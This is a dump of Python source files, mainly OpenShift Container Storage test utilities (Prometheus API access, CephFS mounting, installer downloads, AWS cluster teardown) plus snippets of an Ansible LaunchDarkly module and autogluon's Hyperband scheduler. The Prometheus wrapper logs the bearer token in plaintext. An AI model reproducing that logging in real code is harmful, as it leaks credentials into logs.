metadata
dict | text
stringlengths 60
3.49M
|
---|---|
{
"source": "jhutar/ocs-ci",
"score": 2
} |
#### File: ocs_ci/utility/prometheus.py
```python
import base64
import logging
import os
import requests
import tempfile
import yaml
from ocs_ci.framework import config
from ocs_ci.ocs import constants, defaults
from ocs_ci.ocs.ocp import OCP
logger = logging.getLogger(name=__file__)
class PrometheusAPI(object):
"""
This is wrapper class for Prometheus API.
"""
_token = None
_user = None
_password = None
_endpoint = None
_cacert = None
def __init__(self, user=None, password=None):
"""
Constructor for PrometheusAPI class.
Args:
user (str): OpenShift username used to connect to API
"""
self._user = user or config.RUN['username']
if not password:
filename = os.path.join(
config.ENV_DATA['cluster_path'],
config.RUN['password_location']
)
with open(filename) as f:
password = f.read()
self._password = password
self.refresh_connection()
self.generate_cert()
def refresh_connection(self):
"""
Login into OCP, refresh endpoint and token.
"""
ocp = OCP(
kind=constants.ROUTE,
namespace=defaults.OCS_MONITORING_NAMESPACE
)
assert ocp.login(self._user, self._password), 'Login to OCP failed'
self._token = ocp.get_user_token()
route_obj = ocp.get(
resource_name=defaults.PROMETHEUS_ROUTE
)
self._endpoint = 'https://' + route_obj['spec']['host']
def generate_cert(self):
"""
Generate CA certificate from kubeconfig for API.
TODO: find proper way how to generate/load cert files.
"""
kubeconfig_path = os.path.join(
config.ENV_DATA['cluster_path'],
config.RUN['kubeconfig_location']
)
with open(kubeconfig_path, "r") as f:
kubeconfig = yaml.load(f, yaml.Loader)
cert_file = tempfile.NamedTemporaryFile(delete=False)
cert_file.write(
base64.b64decode(
kubeconfig['clusters'][0]['cluster']['certificate-authority-data']
)
)
cert_file.close()
self._cacert = cert_file.name
logger.info(f"Generated CA certification file: {self._cacert}")
def get(self, resource, payload=None):
"""
Get alerts from Prometheus API.
Args:
resource (str): Represents part of uri that specifies given
resource.
payload (dict): Provide parameters to GET API call.
e.g. for `alerts` resource this can be
{'silenced': False, 'inhibited': False}
Returns:
dict: Response from Prometheus alerts api
"""
pattern = f"/api/v1/{resource}"
headers = {'Authorization': f"Bearer {self._token}"}
logger.info(f"GET {self._endpoint + pattern}")
logger.info(f"headers={headers}")
logger.info(f"verify={self._cacert}")
logger.info(f"params={payload}")
response = requests.get(
self._endpoint + pattern,
headers=headers,
verify=self._cacert,
params=payload
)
return response
```
#### File: ocs_ci/utility/utils.py
```python
import json
import logging
import os
import platform
import random
import shlex
import string
import subprocess
import time
import traceback
import requests
import yaml
import re
import smtplib
from ocs_ci.ocs.exceptions import (
CommandFailed, UnsupportedOSType, TimeoutExpiredError,
)
from ocs_ci.framework import config
from ocs_ci.utility.aws import AWS
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from ocs_ci.ocs import constants
from bs4 import BeautifulSoup
log = logging.getLogger(__name__)
# variables
mounting_dir = '/mnt/cephfs/'
clients = []
md5sum_list1 = []
md5sum_list2 = []
fuse_clients = []
kernel_clients = []
mon_node = ''
mon_node_ip = ''
mds_nodes = []
md5sum_file_lock = []
active_mdss = []
RC = []
failure = {}
output = []
unique_test_names = []
# function for getting the clients
def get_client_info(ceph_nodes, clients):
log.info("Getting Clients")
for node in ceph_nodes:
if node.role == 'client':
clients.append(node)
# Identifying MON node
for node in ceph_nodes:
if node.role == 'mon':
mon_node = node
out, err = mon_node.exec_command(cmd='sudo hostname -I')
mon_node_ip = out.read().decode().rstrip('\n')
break
for node in ceph_nodes:
if node.role == 'mds':
mds_nodes.append(node)
for node in clients:
node.exec_command(cmd='sudo yum install -y attr')
fuse_clients = clients[0:2] # seperating clients for fuse and kernel
kernel_clients = clients[2:4]
return fuse_clients, kernel_clients, mon_node, mounting_dir, mds_nodes, md5sum_file_lock, mon_node_ip
# function for providing authorization to the clients from MON ndoe
def auth_list(clients, mon_node):
for node in clients:
log.info("Giving required permissions for clients from MON node:")
mon_node.exec_command(
cmd="sudo ceph auth get-or-create client.%s mon 'allow *' mds 'allow *, allow rw path=/' "
"osd 'allow rw pool=cephfs_data' -o /etc/ceph/ceph.client.%s.keyring" % (node.hostname, node.hostname))
out, err = mon_node.exec_command(
sudo=True, cmd='cat /etc/ceph/ceph.client.%s.keyring' % (node.hostname))
keyring = out.read().decode()
key_file = node.write_file(
sudo=True,
file_name='/etc/ceph/ceph.client.%s.keyring' % (node.hostname),
file_mode='w')
key_file.write(keyring)
key_file.flush()
node.exec_command(cmd="sudo chmod 644 /etc/ceph/ceph.client.%s.keyring" % (node.hostname))
# creating mounting directory
node.exec_command(cmd='sudo mkdir %s' % (mounting_dir))
# MOunting single FS with ceph-fuse
def fuse_mount(fuse_clients, mounting_dir):
try:
for client in fuse_clients:
log.info("Creating mounting dir:")
log.info("Mounting fs with ceph-fuse on client %s:" % (client.hostname))
client.exec_command(cmd="sudo ceph-fuse -n client.%s %s" % (client.hostname, mounting_dir))
out, err = client.exec_command(cmd='mount')
mount_output = out.read().decode()
mount_output.split()
log.info("Checking if fuse mount is is passed of failed:")
if 'fuse' in mount_output:
log.info("ceph-fuse mounting passed")
else:
log.error("ceph-fuse mounting failed")
return md5sum_list1
except Exception as e:
log.error(e)
def kernel_mount(mounting_dir, mon_node_ip, kernel_clients):
try:
for client in kernel_clients:
out, err = client.exec_command(cmd='sudo ceph auth get-key client.%s' % (client.hostname))
secret_key = out.read().decode().rstrip('\n')
mon_node_ip = mon_node_ip.replace(" ", "")
client.exec_command(
cmd='sudo mount -t ceph %s:6789:/ %s -o name=%s,secret=%s' % (
mon_node_ip, mounting_dir, client.hostname, secret_key))
out, err = client.exec_command(cmd='mount')
mount_output = out.read().decode()
mount_output.split()
log.info("Checking if kernel mount is is passed of failed:")
if '%s:6789:/' % (mon_node_ip) in mount_output:
log.info("kernel mount passed")
else:
log.error("kernel mount failed")
return md5sum_list2
except Exception as e:
log.error(e)
def fuse_client_io(client, mounting_dir):
try:
rand_count = random.randint(1, 5)
rand_bs = random.randint(100, 300)
log.info("Performing IOs on fuse-clients")
client.exec_command(
cmd="sudo dd if=/dev/zero of=%snewfile_%s bs=%dM count=%d" %
(mounting_dir, client.hostname, rand_bs, rand_count),
long_running=True)
except Exception as e:
log.error(e)
def kernel_client_io(client, mounting_dir):
try:
rand_count = random.randint(1, 6)
rand_bs = random.randint(100, 500)
log.info("Performing IOs on kernel-clients")
client.exec_command(
cmd="sudo dd if=/dev/zero of=%snewfile_%s bs=%dM count=%d" %
(mounting_dir, client.hostname, rand_bs, rand_count),
long_running=True)
except Exception as e:
log.error(e)
def fuse_client_md5(fuse_clients, md5sum_list1):
try:
log.info("Calculating MD5 sums of files in fuse-clients:")
for client in fuse_clients:
md5sum_list1.append(
client.exec_command(cmd="sudo md5sum %s* | awk '{print $1}' " % (mounting_dir), long_running=True))
except Exception as e:
log.error(e)
def kernel_client_md5(kernel_clients, md5sum_list2):
try:
log.info("Calculating MD5 sums of files in kernel-clients:")
for client in kernel_clients:
md5sum_list2.append(
client.exec_command(cmd="sudo md5sum %s* | awk '{print $1}' " % (mounting_dir), long_running=True))
except Exception as e:
log.error(e)
# checking file locking mechanism
def file_locking(client):
try:
to_lock_file = """
import fcntl
import subprocess
import time
try:
f = open('/mnt/cephfs/to_test_file_lock', 'w+')
fcntl.lockf(f, fcntl.LOCK_EX | fcntl.LOCK_NB)
print "locking file:--------------------------------"
subprocess.check_output(["sudo","dd","if=/dev/zero","of=/mnt/cephfs/to_test_file_lock","bs=1M","count=2"])
except IOError as e:
print e
finally:
print "Unlocking file:------------------------------"
fcntl.lockf(f,fcntl.LOCK_UN)
"""
to_lock_code = client.write_file(
sudo=True,
file_name='/home/cephuser/file_lock.py',
file_mode='w')
to_lock_code.write(to_lock_file)
to_lock_code.flush()
out, err = client.exec_command(cmd="sudo python /home/cephuser/file_lock.py")
output = out.read().decode()
output.split()
if 'Errno 11' in output:
log.info("File locking achieved, data is not corrupted")
elif 'locking' in output:
log.info("File locking achieved, data is not corrupted")
else:
log.error("Data is corrupted")
out, err = client.exec_command(cmd="sudo md5sum %sto_test_file_lock | awk '{print $1}'" % (mounting_dir))
md5sum_file_lock.append(out.read().decode())
except Exception as e:
log.error(e)
def activate_multiple_mdss(mds_nodes):
try:
log.info("Activating Multiple MDSs")
for node in mds_nodes:
out1, err = node.exec_command(cmd="sudo ceph fs set cephfs allow_multimds true --yes-i-really-mean-it")
out2, err = node.exec_command(cmd="sudo ceph fs set cephfs max_mds 2")
break
except Exception as e:
log.error(e)
def mkdir_pinning(clients, range1, range2, dir_name, pin_val):
try:
log.info("Creating Directories and Pinning to MDS %s" % (pin_val))
for client in clients:
for num in range(range1, range2):
out, err = client.exec_command(cmd='sudo mkdir %s%s_%d' % (mounting_dir, dir_name, num))
if pin_val != '':
client.exec_command(
cmd='sudo setfattr -n ceph.dir.pin -v %s %s%s_%d' % (pin_val, mounting_dir, dir_name, num))
else:
print("Pin val not given")
print(out.read().decode())
print(time.time())
break
except Exception as e:
log.error(e)
def allow_dir_fragmentation(mds_nodes):
try:
log.info("Allowing directorty fragmenation for splitting")
for node in mds_nodes:
node.exec_command(cmd='sudo ceph fs set cephfs allow_dirfrags 1')
break
except Exception as e:
log.error(e)
def mds_fail_over(mds_nodes):
try:
rand = random.randint(0, 1)
for node in mds_nodes:
log.info("Failing MDS %d" % (rand))
node.exec_command(cmd='sudo ceph mds fail %d' % (rand))
break
except Exception as e:
log.error(e)
def pinned_dir_io(clients, mds_fail_over, num_of_files, range1, range2):
try:
log.info("Performing IOs and MDSfailovers on clients")
for client in clients:
client.exec_command(cmd='sudo pip install crefi')
for num in range(range1, range2):
if mds_fail_over != '':
mds_fail_over(mds_nodes)
out, err = client.exec_command(cmd='sudo crefi -n %d %sdir_%d' % (num_of_files, mounting_dir, num))
rc = out.channel.recv_exit_status()
print(out.read().decode())
RC.append(rc)
print(time.time())
if rc == 0:
log.info("Client IO is going on,success")
else:
log.error("Client IO got interrupted")
failure.update({client: out})
break
break
except Exception as e:
log.error(e)
def custom_ceph_config(suite_config, custom_config, custom_config_file):
"""
Combines and returns custom configuration overrides for ceph.
Hierarchy is as follows:
custom_config > custom_config_file > suite_config
Args:
suite_config: ceph_conf_overrides that currently exist in the test suite
custom_config: custom config args provided by the cli (these all go to the global scope)
custom_config_file: path to custom config yaml file provided by the cli
Returns
New value to be used for ceph_conf_overrides in test config
"""
log.debug("Suite config: {}".format(suite_config))
log.debug("Custom config: {}".format(custom_config))
log.debug("Custom config file: {}".format(custom_config_file))
full_custom_config = suite_config or {}
cli_config_dict = {}
custom_config_dict = {}
# retrieve custom config from file
if custom_config_file:
with open(custom_config_file) as f:
custom_config_dict = yaml.safe_load(f)
log.info("File contents: {}".format(custom_config_dict))
# format cli configs into dict
if custom_config:
cli_config_dict = dict(item.split('=') for item in custom_config)
# combine file and cli configs
if cli_config_dict:
if not custom_config_dict.get('global'):
custom_config_dict['global'] = {}
for key, value in cli_config_dict.items():
custom_config_dict['global'][key] = value
# combine file and suite configs
for key, value in custom_config_dict.items():
subsection = {}
if full_custom_config.get(key):
subsection.update(full_custom_config[key])
subsection.update(value)
full_custom_config[key] = subsection
log.info("Full custom config: {}".format(full_custom_config))
return full_custom_config
def run_cmd(cmd, **kwargs):
"""
Run an arbitrary command locally
Args:
cmd (str): command to run
Raises:
CommandFailed: In case the command execution fails
Returns:
(str) Decoded stdout of command
"""
log.info(f"Executing command: {cmd}")
if isinstance(cmd, str):
cmd = shlex.split(cmd)
r = subprocess.run(
cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE,
**kwargs
)
log.debug(f"Command output: {r.stdout.decode()}")
if r.stderr and not r.returncode:
log.warning(f"Command warning:: {r.stderr.decode()}")
if r.returncode:
raise CommandFailed(
f"Error during execution of command: {cmd}."
f"\nError is {r.stderr.decode()}"
)
return r.stdout.decode()
def download_file(url, filename):
"""
Download a file from a specified url
Args:
url (str): URL of the file to download
filename (str): Name of the file to write the download to
"""
log.debug(f"Download '{url}' to '{filename}'.")
with open(filename, "wb") as f:
r = requests.get(url)
f.write(r.content)
assert r.ok
def destroy_cluster(cluster_path, log_level="DEBUG"):
"""
Destroy existing cluster resources in AWS.
Args:
cluster_path (str): filepath to cluster directory to be destroyed
log_level (str): log level to set for openshift_installer
"""
# Download installer
installer = get_openshift_installer()
destroy_cmd = (
f"{installer} destroy cluster "
f"--dir {cluster_path} "
f"--log-level {log_level}"
)
try:
cluster_path = os.path.normpath(cluster_path)
# Retrieve cluster name and aws region from metadata
metadata_file = os.path.join(cluster_path, "metadata.json")
with open(metadata_file) as f:
metadata = json.loads(f.read())
cluster_name = metadata.get("clusterName")
region_name = metadata.get("aws").get("region")
# Execute destroy cluster using OpenShift installer
log.info(f"Destroying cluster defined in {cluster_path}")
run_cmd(destroy_cmd)
# Find and delete volumes
aws = AWS(region_name)
volume_pattern = f"{cluster_name}*"
log.debug(f"Finding volumes with pattern: {volume_pattern}")
volumes = aws.get_volumes_by_name_pattern(volume_pattern)
log.debug(f"Found volumes: \n {volumes}")
for volume in volumes:
aws.detach_and_delete_volume(volume)
# Remove installer
delete_file(installer)
except Exception:
log.error(traceback.format_exc())
def get_openshift_installer(
version=None,
bin_dir=None,
force_download=False,
):
"""
Download the OpenShift installer binary, if not already present.
Update env. PATH and get path of the openshift installer binary.
Args:
version (str): Version of the installer to download
bin_dir (str): Path to bin directory (default: config.RUN['bin_dir'])
force_download (bool): Force installer download even if already present
Returns:
str: Path to the installer binary
"""
version = version or config.DEPLOYMENT['installer_version']
bin_dir = os.path.expanduser(bin_dir or config.RUN['bin_dir'])
installer_filename = "openshift-install"
installer_binary_path = os.path.join(bin_dir, installer_filename)
if os.path.isfile(installer_binary_path) and force_download:
delete_file(installer_binary_path)
if os.path.isfile(installer_binary_path):
log.debug(f"Installer exists ({installer_binary_path}), skipping download.")
# TODO: check installer version
else:
log.info(f"Downloading openshift installer ({version}).")
prepare_bin_dir()
# record current working directory and switch to BIN_DIR
previous_dir = os.getcwd()
os.chdir(bin_dir)
tarball = f"{installer_filename}.tar.gz"
url = get_openshift_mirror_url(installer_filename, version)
download_file(url, tarball)
run_cmd(f"tar xzvf {tarball} {installer_filename}")
delete_file(tarball)
# return to the previous working directory
os.chdir(previous_dir)
installer_version = run_cmd(f"{installer_binary_path} version")
log.info(f"OpenShift Installer version: {installer_version}")
return installer_binary_path
def get_openshift_client(
version=None,
bin_dir=None,
force_download=False,
):
"""
Download the OpenShift client binary, if not already present.
Update env. PATH and get path of the oc binary.
Args:
version (str): Version of the client to download
(default: config.RUN['client_version'])
bin_dir (str): Path to bin directory (default: config.RUN['bin_dir'])
force_download (bool): Force client download even if already present
Returns:
str: Path to the client binary
"""
version = version or config.RUN['client_version']
bin_dir = os.path.expanduser(bin_dir or config.RUN['bin_dir'])
client_binary_path = os.path.join(bin_dir, 'oc')
if os.path.isfile(client_binary_path) and force_download:
delete_file(client_binary_path)
if os.path.isfile(client_binary_path):
log.debug(f"Client exists ({client_binary_path}), skipping download.")
# TODO: check client version
else:
log.info(f"Downloading openshift client ({version}).")
prepare_bin_dir()
# record current working directory and switch to BIN_DIR
previous_dir = os.getcwd()
os.chdir(bin_dir)
url = get_openshift_mirror_url('openshift-client', version)
tarball = "openshift-client.tar.gz"
download_file(url, tarball)
run_cmd(f"tar xzvf {tarball} oc kubectl")
delete_file(tarball)
# return to the previous working directory
os.chdir(previous_dir)
client_version = run_cmd(f"{client_binary_path} version")
log.info(f"OpenShift Client version: {client_version}")
return client_binary_path
def get_openshift_mirror_url(file_name, version):
"""
Format url to OpenShift mirror (for client and installer download).
Args:
file_name (str): Name of file
version (str): Version of the installer or client to download
Returns:
str: Url of the desired file (installer or client)
"""
if platform.system() == "Darwin":
os_type = "mac"
elif platform.system() == "Linux":
os_type = "linux"
else:
raise UnsupportedOSType
url = (
f"https://mirror.openshift.com/pub/openshift-v4/clients/ocp/"
f"{version}/{file_name}-{os_type}-{version}.tar.gz"
)
return url
def prepare_bin_dir(bin_dir=None):
"""
Prepare bin directory for OpenShift client and installer
Args:
bin_dir (str): Path to bin directory (default: config.RUN['bin_dir'])
"""
bin_dir = os.path.expanduser(bin_dir or config.RUN['bin_dir'])
try:
os.mkdir(bin_dir)
log.info(f"Directory '{bin_dir}' successfully created.")
except FileExistsError:
log.debug(f"Directory '{bin_dir}' already exists.")
def add_path_to_env_path(path):
"""
Add path to the PATH environment variable (if not already there).
Args:
path (str): Path which should be added to the PATH env. variable
"""
env_path = os.environ['PATH'].split(os.pathsep)
if path not in env_path:
os.environ['PATH'] = os.pathsep.join([path] + env_path)
log.info(f"Path '{path}' added to the PATH environment variable.")
log.debug(f"PATH: {os.environ['PATH']}")
def delete_file(file_name):
"""
Delete file_name
Args:
file_name (str): Path to the file you want to delete
"""
os.remove(file_name)
class TimeoutSampler(object):
"""
Samples the function output.
This is a generator object that at first yields the output of function
`func`. After the yield, it either raises instance of `timeout_exc_cls` or
sleeps `sleep` seconds.
Yielding the output allows you to handle every value as you wish.
Feel free to set the instance variables.
"""
def __init__(self, timeout, sleep, func, *func_args, **func_kwargs):
self.timeout = timeout
''' Timeout in seconds. '''
self.sleep = sleep
''' Sleep interval seconds. '''
self.func = func
''' A function to sample. '''
self.func_args = func_args
''' Args for func. '''
self.func_kwargs = func_kwargs
''' Kwargs for func. '''
self.start_time = None
''' Time of starting the sampling. '''
self.last_sample_time = None
''' Time of last sample. '''
self.timeout_exc_cls = TimeoutExpiredError
''' Class of exception to be raised. '''
self.timeout_exc_args = (self.timeout,)
''' An args for __init__ of the timeout exception. '''
def __iter__(self):
if self.start_time is None:
self.start_time = time.time()
while True:
self.last_sample_time = time.time()
try:
yield self.func(*self.func_args, **self.func_kwargs)
except Exception:
pass
if self.timeout < (time.time() - self.start_time):
raise self.timeout_exc_cls(*self.timeout_exc_args)
time.sleep(self.sleep)
def wait_for_func_status(self, result):
"""
Get function and run it for given time until success or timeout.
(using __iter__ function)
Args:
result (bool): Expected result from func.
Examples:
sample = TimeoutSampler(
timeout=60, sleep=1, func=some_func, func_arg1="1",
func_arg2="2"
)
if not sample.waitForFuncStatus(result=True):
raise Exception
"""
try:
for res in self:
if result == res:
return True
except self.timeout_exc_cls:
log.error(
f"({self.func.__name__}) return incorrect status after timeout"
)
return False
def get_random_str(size=13):
"""
generates the random string of given size
Args:
size (int): number of random characters to generate
Returns:
str : string of random characters of given size
"""
chars = string.ascii_lowercase + string.digits
return ''.join(random.choice(chars) for _ in range(size))
def run_async(command):
"""
Run command locally and return without waiting for completion
Args:
command (str): The command to run.
Returns:
An open descriptor to be used by the calling function.
Example:
command = 'oc delete pvc pvc1'
proc = run_async(command)
ret, out, err = proc.async_communicate()
"""
log.info(f"Executing command: {command}")
popen_obj = subprocess.Popen(
command, stdin=subprocess.PIPE, stdout=subprocess.PIPE, shell=True,
encoding='utf-8'
)
def async_communicate():
"""
Wait for command to complete and fetch the result
Returns:
retcode, stdout, stderr of the command
"""
stdout, stderr = popen_obj.communicate()
retcode = popen_obj.returncode
return retcode, stdout, stderr
popen_obj.async_communicate = async_communicate
return popen_obj
def is_cluster_running(cluster_path):
from ocs_ci.ocs.openshift_ops import OCP
return config.RUN['cli_params'].get('cluster_path') and OCP.set_kubeconfig(
os.path.join(cluster_path, config.RUN.get('kubeconfig_location'))
)
def decompose_html_attributes(soup, attributes):
"""
Decomposes the given html attributes
Args:
soup (obj): BeautifulSoup object
attributes (list): attributes to decompose
Returns: None
"""
for attribute in attributes:
tg = soup.find_all(attrs={"class": attribute})
for each in tg:
each.decompose()
def parse_html_for_email(soup):
"""
Parses the html and filters out the unnecessary data/tags/attributes
for email reporting
Args:
soup (obj): BeautifulSoup object
"""
decompose_html_attributes(soup, ["extra", "col-links"])
soup.find(id="not-found-message").decompose()
for tr in soup.find_all('tr'):
for th in tr.find_all('th'):
if "Links" in th.text:
th.decompose()
for p in soup.find_all('p'):
if "(Un)check the boxes to filter the results." in p.text:
p.decompose()
if "pytest-html" in p.text:
data = p.text.split("by")[0]
p.string = data
for ip in soup.find_all('input'):
if not ip.has_attr('disabled'):
ip['disabled'] = 'true'
for td in soup.find_all('td'):
if "pytest" in td.text or "html" in td.text:
data = td.text.replace('&apos', '')
td.string = data
main_header = soup.find('h1')
main_header.string.replace_with('OCS-CI RESULTS')
def email_reports():
"""
Email results of test run
"""
mailids = config.RUN['cli_params']['email']
recipients = []
[recipients.append(mailid) for mailid in mailids.split(",")]
sender = "<EMAIL>"
msg = MIMEMultipart('alternative')
msg['Subject'] = f"ocs-ci results for RUN ID: {config.RUN['run_id']}"
msg['From'] = sender
msg['To'] = ", ".join(recipients)
html = config.RUN['cli_params']['--html']
html_data = open(os.path.expanduser(html)).read()
soup = BeautifulSoup(html_data, "html.parser")
parse_html_for_email(soup)
part1 = MIMEText(soup, 'html')
msg.attach(part1)
try:
s = smtplib.SMTP('localhost')
s.sendmail(sender, recipients, msg.as_string())
s.quit()
log.info(f"Results have been emailed to {recipients}")
except Exception as e:
log.exception(e)
def get_cluster_version_info():
"""
Gets the complete cluster version information
Returns:
dict: cluster version information
"""
# importing here to avoid circular imports
from ocs_ci.ocs.ocp import OCP
ocp = OCP(kind="clusterversion")
cluster_version_info = ocp.get("version")
return cluster_version_info
def get_cluster_version():
"""
Gets the cluster version
Returns:
str: cluster version
"""
return get_cluster_version_info()["status"]["desired"]["version"]
def get_cluster_image():
"""
Gets the cluster image
Returns:
str: cluster image
"""
return get_cluster_version_info()["status"]["desired"]["image"]
def get_ceph_version():
"""
Gets the ceph version
Returns:
str: ceph version
"""
# importing here to avoid circular imports
from ocs_ci.ocs.resources import pod
ct_pod = pod.get_ceph_tools_pod()
ceph_version = ct_pod.exec_ceph_cmd("ceph version")
return re.split(r'ceph version ', ceph_version['version'])[1]
def get_rook_version():
"""
Gets the rook version
Returns:
str: rook version
"""
# importing here to avoid circular imports
from ocs_ci.ocs.resources import pod
ct_pod = pod.get_ceph_tools_pod()
rook_versions = ct_pod.exec_ceph_cmd("rook version", format='')
return rook_versions['rook']
def get_csi_versions():
"""
Gets the CSI related version information
Returns:
dict: CSI related version information
"""
csi_versions = {}
# importing here to avoid circular imports
from ocs_ci.ocs.ocp import OCP
ocp_pod_obj = OCP(
kind=constants.POD, namespace=config.ENV_DATA['cluster_namespace']
)
csi_provisioners = [
'csi-cephfsplugin-provisioner',
'csi-rbdplugin-provisioner'
]
for provisioner in csi_provisioners:
csi_provisioner_pod = run_cmd(
f"oc -n {config.ENV_DATA['cluster_namespace']} get pod -l "
f"'app={provisioner}' -o jsonpath='{{.items[0].metadata.name}}'"
)
desc = ocp_pod_obj.get(csi_provisioner_pod)
for container in desc['spec']['containers']:
name = container['image'].split("/")[-1].split(":")[0]
version = container['image'].split("/")[-1].split(":")[1]
csi_versions[name] = version
return csi_versions
def create_directory_path(path):
"""
Creates directory if path doesn't exists
"""
path = os.path.expanduser(path)
if not os.path.exists(path):
os.makedirs(path)
else:
log.debug(f"{path} already exists")
def ocsci_log_path():
"""
Construct the full path for the log directory.
Returns:
str: full path for ocs-ci log directory
"""
return os.path.expanduser(
os.path.join(
config.RUN['log_dir'],
f"ocs-ci-logs-{config.RUN['run_id']}"
)
)
```
#### File: ocs-ci/tests/test_fio_workload.py
```python
import pytest
import logging
from ocs_ci.ocs import constants, exceptions
from ocs_ci.ocs import workload
from ocs_ci.framework.testlib import ManageTest
from ocs_ci.utility.utils import TimeoutSampler
from ocs_ci.utility import templating
from tests.fixtures import (
create_rbd_storageclass, create_rbd_pod, create_pvc, create_ceph_block_pool,
create_rbd_secret, delete_pvc, delete_pod, create_project
)
logger = logging.getLogger(__name__)
@pytest.mark.usefixtures(
create_rbd_secret.__name__,
create_ceph_block_pool.__name__,
create_rbd_storageclass.__name__,
create_project.__name__,
create_pvc.__name__,
create_rbd_pod.__name__,
delete_pvc.__name__,
delete_pod.__name__
)
class TestFIOWorkload(ManageTest):
def test_fio_with_block_storage(self):
name = 'test_workload'
spec = self.pod_obj.data.get('spec')
path = (
spec.get('containers')[0].get('volumeMounts')[0].get('mountPath')
)
work_load = 'fio'
storage_type = 'fs'
# few io parameters for Fio
runtime = 10
size = '200M'
wl = workload.WorkLoad(
name, path, work_load, storage_type, self.pod_obj
)
assert wl.setup()
io_params = templating.load_yaml_to_dict(constants.FIO_IO_PARAMS_YAML)
io_params['runtime'] = runtime
io_params['size'] = size
future_result = wl.run(**io_params)
timeout = 1200
sample = TimeoutSampler(
timeout=timeout, sleep=3, func=future_result.done
)
assert sample.wait_for_func_status(result=True)
try:
logger.info(future_result.result())
except exceptions.CommandFailed:
logger.exception(f"FIO failed")
raise
except Exception:
logger.exception(f"Found Exception")
raise
``` |
{
"source": "jhutchings1/ansible-launchdarkly-collection",
"score": 2
} |
#### File: plugins/module_utils/environment.py
```python
def ld_env_arg_spec():
return dict(
environment_key=dict(type="str", required=True, aliases=["key"]),
color=dict(type="str"),
name=dict(type="str"),
default_ttl=dict(type="int"),
tags=dict(type="list", elements="str"),
confirm_changes=dict(type="bool"),
require_comments=dict(type="bool"),
default_track_events=dict(type="bool"),
)
def env_ld_builder(environments):
patches = []
for env in environments:
env_mapped = dict(
(launchdarkly_api.Environment.attribute_map[k], v)
for k, v in env.items()
if v is not None
)
patches.append(launchdarkly_api.EnvironmentPost(**env))
return patches
``` |
{
"source": "jhutchings1/autogluon",
"score": 3
} |
#### File: autogluon/scheduler/hyperband_stopping.py
```python
import logging
import numpy as np
import copy
logger = logging.getLogger(__name__)
def map_resource_to_index(resource, rf, min_t, max_t):
max_rungs = int(np.log(max_t / min_t) / np.log(rf) + 1)
index = int(np.round(np.log(resource * max_t / min_t) / np.log(rf)))
index = max(min(index, max_rungs - 1), 0)
return index
def _sample_bracket(num_brackets, max_num_rungs, rf):
# Brackets are sampled in proportion to the number of configs started
# in synchronous Hyperband in each bracket
if num_brackets > 1:
smax_plus1 = max_num_rungs
probs = np.array([
(smax_plus1 / (smax_plus1 - s)) * (rf ** (smax_plus1 - s - 1))
for s in range(num_brackets)])
normalized = probs / probs.sum()
return np.random.choice(num_brackets, p=normalized)
else:
return 0
class HyperbandStopping_Manager(object):
"""Hyperband Manager
Implements stopping rule which uses the brackets and rung levels defined
in Hyperband. The overall algorithm is NOT what is published as ASHA
(see HyperbandPromotion_Manager), but rather something resembling the
median rule.
Args:
time_attr: str
See HyperbandScheduler.
reward_attr: str
See HyperbandScheduler.
max_t: int
See HyperbandScheduler.
grace_period: int
See HyperbandScheduler.
reduction_factor: int
See HyperbandScheduler.
brackets: int
See HyperbandScheduler.
"""
def __init__(
self, time_attr, reward_attr, max_t, grace_period,
reduction_factor, brackets):
self._reward_attr = reward_attr
self._time_attr = time_attr
self._reduction_factor = reduction_factor
self._max_t = max_t
self._min_t = grace_period
# Maps str(task_id) -> bracket_id
self._task_info = dict()
self._num_stopped = 0
self._brackets = []
for s in range(brackets):
bracket = StoppingBracket(
grace_period, max_t, reduction_factor, s)
if not bracket._rungs:
break
self._brackets.append(bracket)
def on_task_add(self, task, **kwargs):
"""
Since the bracket has already been sampled in on_task_schedule,
not much is done here.
We return the list of milestones for this bracket in reverse
(decreasing) order. The first entry is max_t, even if it is
not a milestone in the bracket. This list contains the resource
levels the task would reach if it ran to max_t without being stopped.
:param task: Only task.task_id is used
:return: See above
"""
assert 'bracket' in kwargs
bracket_id = kwargs['bracket']
bracket = self._brackets[bracket_id]
self._task_info[str(task.task_id)] = bracket_id
levels = [x[0] for x in bracket._rungs]
if levels[0] < self._max_t:
levels.insert(0, self._max_t)
return levels
def _get_bracket(self, task_id):
bracket_id = self._task_info[str(task_id)]
return self._brackets[bracket_id], bracket_id
def on_task_report(self, task, result):
"""
This method is called by the reporter thread whenever a new metric
value is received. It returns a dictionary with all the information
needed for making decisions (e.g., stop / continue task, update
model, etc)
- task_continues: Should task continue or stop/pause?
- update_searcher: True if rung level (or max_t) is hit, at which point
the searcher should be updated
- next_milestone: If hit rung level < max_t, this is the subsequent
rung level (otherwise: None). Used for pending candidates
- bracket_id: Bracket in which the task is running
:param task: Only task.task_id is used
:param result: Current reported results from task
:return: See above
"""
action = False
update_searcher = True
next_milestone = None
bracket, bracket_id = self._get_bracket(task.task_id)
if result[self._time_attr] < self._max_t:
action, update_searcher, next_milestone = bracket.on_result(
task, result[self._time_attr], result[self._reward_attr])
# Special case: If config just reached the last milestone in
# the bracket and survived, next_milestone is equal to max_t
if action and update_searcher and (next_milestone is None):
next_milestone = self._max_t
if action == False:
self._num_stopped += 1
return {
'task_continues': action,
'update_searcher': update_searcher,
'next_milestone': next_milestone,
'bracket_id': bracket_id}
def on_task_complete(self, task, result):
bracket, _ = self._get_bracket(task.task_id)
bracket.on_result(
task, result[self._time_attr], result[self._reward_attr])
self.on_task_remove(task)
def on_task_remove(self, task):
del self._task_info[str(task.task_id)]
def _sample_bracket(self):
return _sample_bracket(
num_brackets=len(self._brackets),
max_num_rungs=len(self._brackets[0]._rungs),
rf=self._reduction_factor)
def on_task_schedule(self):
# Sample bracket for task to be scheduled
bracket_id = self._sample_bracket()
# 'milestone' is first milestone the new config will get to
extra_kwargs = {
'bracket': bracket_id,
'milestone': self._brackets[bracket_id].get_first_milestone()}
return None, extra_kwargs
def snapshot_rungs(self, bracket_id):
return self._brackets[bracket_id].snapshot_rungs()
def resource_to_index(self, resource):
return map_resource_to_index(
resource, self._reduction_factor, self._min_t, self._max_t)
def __repr__(self):
reprstr = self.__class__.__name__ + '(' + \
'reward_attr: ' + self._reward_attr + \
', time_attr: ' + self._time_attr + \
', reduction_factor: ' + str(self._reduction_factor) + \
', max_t: ' + str(self._max_t) + \
', brackets: ' + str(self._brackets) + \
')'
return reprstr
class StoppingBracket(object):
"""Bookkeeping system to track the cutoffs.
Rungs are created in reversed order so that we can more easily find
